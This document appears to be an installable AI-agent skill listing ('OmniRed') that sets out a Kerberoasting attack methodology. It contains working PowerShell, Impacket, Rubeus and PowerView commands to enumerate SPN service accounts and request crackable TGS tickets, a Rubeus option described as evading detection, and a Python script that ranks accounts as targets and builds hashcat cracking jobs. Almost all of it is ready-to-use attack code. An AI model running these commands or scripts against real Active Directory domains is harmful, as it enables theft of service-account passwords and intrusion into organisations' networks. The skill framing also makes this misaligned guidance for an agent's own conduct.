
kerberoasting

Kerberoasting expert methodology — request TGS tickets for SPN-registered service accounts, extract, and crack offline. Covers enumeration, targeted attacks, AS-REP roasting, and detection evasion.
sunilgentyala/OmniRed · ★ 0 · AI & Automation · score 63
Install: claude install-skill sunilgentyala/OmniRed
# Kerberoasting

## Attack Surface

Any domain-joined Windows environment where service accounts have Service Principal Names (SPNs) registered. Requires: valid domain credentials (any user). Service accounts often have weak passwords set long ago and rarely rotated.

## Methodology

### Phase 1 — Enumerate SPNs

```powershell
# Native PowerShell (needs the ActiveDirectory RSAT module)
Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName |
    Select-Object SamAccountName, ServicePrincipalName | Format-List

# setspn (built-in)
setspn -T domain.local -Q */*

# LDAP query (no module needed; objectClass=user also matches computer objects)
([ADSISearcher]'(&(objectClass=user)(servicePrincipalName=*))').FindAll() |
    ForEach-Object { $_.Properties['samaccountname'] }
```

Target high-value accounts: svc_sql, svc_exchange, svc_backup, svc_iis, Administrator (if an SPN is set). Skip names ending in `$`: those are computer accounts, whose passwords are long random strings and are not crackable.

### Phase 2 — Request TGS tickets

**Impacket (Linux):**

```bash
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.0.0.1 -request
impacket-GetUserSPNs domain.local/user:password -dc-ip 10.0.0.1 -request -outputfile hashes.txt
```

**Rubeus (Windows, from domain-joined host):**

```powershell
.\Rubeus.exe kerberoast /outfile:hashes.txt
.\Rubeus.exe kerberoast /user:svc_sql /outfile:svc_sql_hash.txt   # targeted
# tgtdeleg trick: roast only accounts that do not have AES enabled, so the RC4
# request is not an encryption downgrade (etype 0x17 in event 4769) that detection rules key on
.\Rubeus.exe kerberoast /rc4opsec
```

**PowerView:**

```powershell
Import-Module .\PowerView.ps1
# -ExpandProperty writes the bare hash strings; Select-Object Hash alone produces a
# table that Out-File truncates. -Encoding ascii avoids the UTF-16 default, which hashcat cannot read.
Invoke-Kerberoast -OutputFormat HashCat | Select-Object -ExpandProperty Hash | Out-File hashes.txt -Encoding ascii
```

### Phase 3 — Offline cracking
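As an added example (not part of the OmniRed skill or of Impacket, Rubeus or PowerView), the Python below ties the phases together on constructed data: it ranks the SPN accounts Phase 1 returns by how worthwhile they are to roast (RC4-only, adminCount, password age, computer accounts dropped), and it parses the `$krb5tgs$` lines Phase 2 writes, in both the `*user$realm$spn*` form and the `user$realm$*spn*` form, to pick the hashcat mode for Phase 3 (13100 for etype 23, 19600 for 17, 19700 for 18). Record field names follow the LDAP attributes; treating an unset msDS-SupportedEncryptionTypes as RC4-only is an assumption flagged in the code, and the sample hash ciphertext is truncated.

```python
"""Added example, not part of the OmniRed skill or the tools it names: triage
Phase 1 SPN accounts and Phase 2 hash lines. All data below is constructed."""
import re
from datetime import datetime, timedelta, timezone

# msDS-SupportedEncryptionTypes bit flags
ETYPE_RC4, ETYPE_AES128, ETYPE_AES256 = 0x4, 0x8, 0x10
# hashcat modes for Kerberos 5 TGS-REP, keyed by the etype number in the hash line
HASHCAT_MODE = {23: 13100, 17: 19600, 18: 19700}
# pwdLastSet is a FILETIME: 100 ns ticks since 1601-01-01 UTC
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(ticks):
    return FILETIME_EPOCH + timedelta(microseconds=ticks // 10)


def datetime_to_filetime(dt):
    return int((dt - FILETIME_EPOCH) / timedelta(microseconds=1)) * 10


def rank_targets(accounts, now):
    """Order SPN accounts by roasting value. Computer accounts (name ends in '$')
    are dropped: (objectClass=user) returns them, but their passwords are random."""
    ranked = []
    for acct in accounts:
        name = acct["samaccountname"]
        if name.endswith("$"):
            continue
        enc = acct.get("msds-supportedencryptiontypes") or 0
        # Assumption: 0/absent means the KDC issues RC4 service tickets for this account
        rc4_only = not (enc & (ETYPE_AES128 | ETYPE_AES256))
        age_days = (now - filetime_to_datetime(acct["pwdlastset"])).days if acct["pwdlastset"] else None
        score = 0
        if rc4_only:
            score += 3  # RC4 cracks orders of magnitude faster than AES (PBKDF2, 4096 iterations)
        if acct.get("admincount"):
            score += 2  # adminCount=1: member of a protected group
        if age_days is None or age_days > 365:
            score += 1  # old or never-set password, likely weak
        ranked.append({"user": name, "spn": acct["serviceprincipalname"][0],
                       "rc4_only": rc4_only, "pwd_age_days": age_days, "score": score})
    return sorted(ranked, key=lambda r: (-r["score"], r["user"]))


_HASH_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$"
    r"(?:\*(?P<u1>[^$*]+)\$(?P<r1>[^$*]+)\$(?P<s1>[^*]+)\*"      # *user$realm$spn*  (Rubeus, Impacket etype 23)
    r"|(?P<u2>[^$*]+)\$(?P<r2>[^$*]+)(?:\$\*(?P<s2>[^*]+)\*)?)"  # user$realm[$*spn*] (Impacket AES, hashcat examples)
    r"\$(?P<checksum>[0-9a-fA-F]+)\$(?P<edata>[0-9a-fA-F]+)$")


def parse_krb5tgs(line):
    """Split one hashcat-format TGS-REP line into its fields and pick the hashcat mode."""
    m = _HASH_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5tgs$ line: %r" % line[:40])
    etype = int(m.group("etype"))
    if etype not in HASHCAT_MODE:
        raise ValueError("unsupported etype %d" % etype)
    # etype 23 carries a 16-byte HMAC-MD5 checksum, etype 17/18 a 12-byte HMAC-SHA1-96
    want = 32 if etype == 23 else 24
    if len(m.group("checksum")) != want:
        raise ValueError("etype %d checksum should be %d hex chars" % (etype, want))
    return {"user": m.group("u1") or m.group("u2"), "realm": m.group("r1") or m.group("r2"),
            "spn": m.group("s1") or m.group("s2"), "etype": etype, "mode": HASHCAT_MODE[etype]}


def hashcat_jobs(lines, wordlist="rockyou.txt"):
    """Group lines by hashcat mode: a mixed RC4/AES file needs one run per mode."""
    by_mode = {}
    for line in lines:
        if line.strip():
            h = parse_krb5tgs(line)
            job = by_mode.setdefault(h["mode"], {"users": [], "lines": []})
            job["users"].append(h["user"])
            job["lines"].append(line.strip())
    for mode, job in by_mode.items():
        job["command"] = "hashcat -m %d -a 0 hashes_%d.txt %s" % (mode, mode, wordlist)
    return by_mode


NOW = datetime(2024, 6, 1, tzinfo=timezone.utc)
SAMPLE_ACCOUNTS = [  # constructed; shapes follow the ADSISearcher results
    {"samaccountname": "svc_sql", "serviceprincipalname": ["MSSQLSvc/sql01.domain.local:1433"],
     "pwdlastset": datetime_to_filetime(datetime(2016, 3, 1, tzinfo=timezone.utc)),
     "msds-supportedencryptiontypes": 0, "admincount": 0},
    {"samaccountname": "svc_backup", "serviceprincipalname": ["backup/bk01.domain.local"],
     "pwdlastset": datetime_to_filetime(datetime(2019, 8, 15, tzinfo=timezone.utc)),
     "msds-supportedencryptiontypes": ETYPE_RC4 | ETYPE_AES128 | ETYPE_AES256, "admincount": 1},
    {"samaccountname": "svc_iis", "serviceprincipalname": ["HTTP/web01.domain.local"],
     "pwdlastset": datetime_to_filetime(datetime(2024, 5, 20, tzinfo=timezone.utc)),
     "msds-supportedencryptiontypes": ETYPE_RC4, "admincount": 0},
    {"samaccountname": "SQL01$", "serviceprincipalname": ["MSSQLSvc/sql01.domain.local"],
     "pwdlastset": datetime_to_filetime(datetime(2024, 5, 1, tzinfo=timezone.utc)),
     "msds-supportedencryptiontypes": ETYPE_AES128 | ETYPE_AES256, "admincount": 0},
]
SAMPLE_HASHES = [  # constructed; ciphertext truncated
    "$krb5tgs$23$*svc_sql$DOMAIN.LOCAL$MSSQLSvc/sql01.domain.local:1433*$" + "ab" * 16 + "$" + "cd" * 40,
    "$krb5tgs$18$svc_backup$DOMAIN.LOCAL$*backup/bk01.domain.local*$" + "12" * 12 + "$" + "34" * 40,
    "$krb5tgs$18$svc_backup2$DOMAIN.LOCAL$" + "12" * 12 + "$" + "34" * 40,  # no SPN field
]

if __name__ == "__main__":
    for t in rank_targets(SAMPLE_ACCOUNTS, NOW):
        print(t)
    for mode, job in hashcat_jobs(SAMPLE_HASHES).items():
        print(mode, job["users"], job["command"])
```

Feed `hashcat_jobs` the real `hashes.txt` and write each `lines` list to the per-mode file named in `command`; hashcat only loads lines that match the selected mode, so a mixed file run once silently drops the other etype.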